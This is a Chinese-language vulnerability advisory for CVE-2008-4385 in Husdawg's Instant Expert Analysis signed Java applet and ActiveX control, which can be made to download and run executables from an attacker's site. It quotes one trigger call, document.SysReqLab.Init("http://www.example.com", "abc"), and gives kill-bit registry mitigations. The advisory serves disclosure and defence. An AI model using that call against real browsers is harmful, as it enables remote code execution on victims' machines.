发布日期：2008-10-14
更新日期：2008-10-17

受影响系统：

Husdawg, LLC Instant Expert Analysis

描述：

---

BUGTRAQ  ID: 31752
CVE(CAN) ID: CVE-2008-4385

Instant Expert Analysis允许站点通过单击方式快速分析用户的软硬件。

Instant Expert Analysis对Firefox或Netscape浏览器使用签名的Java Applet（SRLApplet.class，由sysreqlab2.jar或sysreqlab.jar提供），对Internet Explorer使用签名的ActiveX控件（sysreqlab.dll、sysreqlabsli.dll或sysreqlab2.dll）。

可能会以类似于以下的方式调用sysreqlab2.jar或sysreqlab2.cab的init方式：

  document.SysReqLab.Init("http://www.example.com", "abc");

之后applet从http://www.systemrequirementslab.com 下载一个dll文件并执行。这个dll文件会从init方式开始的位置（如攻击者的站点）加载setup_abc.exe、setup_mz_abc.exe或setup_ie_abc.exe并执行这些可执行文件。

<*来源：David Matscheko
  
  链接：http://secunia.com/advisories/32236/
        http://www.kb.cert.org/vuls/id/166651
        http://www.systemrequirementslab.com/bulletins/security_bulletin_1.html
        http://www.microsoft.com/technet/security/advisory/956391.mspx?pf=true
        http://marc.info/?l=bugtraq&m=122416892413145&w=2
*>

建议：

---

临时解决方法：

* 在Internet Explorer中禁用Instant Expert Analysis ActiveX控件，为以下CLSID设置kill bit：

{67A5F8DC-1A4B-4D66-9F24-A704AD929EEE}
{BE833F39-1E0C-468C-BA70-25AAEE55775E}
{BE833F39-1E0C-468C-BA70-25AAEE55775F}

或者将以下文本保存为.REG文件并导入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{67A5F8DC-1A4B-4D66-9F24-A704AD929EEE}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BE833F39-1E0C-468C-BA70-25AAEE55775E}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BE833F39-1E0C-468C-BA70-25AAEE55775F}]
"Compatibility Flags"=dword:00000400

厂商补丁：

Husdawg, LLC
------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.systemrequirementslab.com/

浏览次数：2902
严重程度：0（网友投票）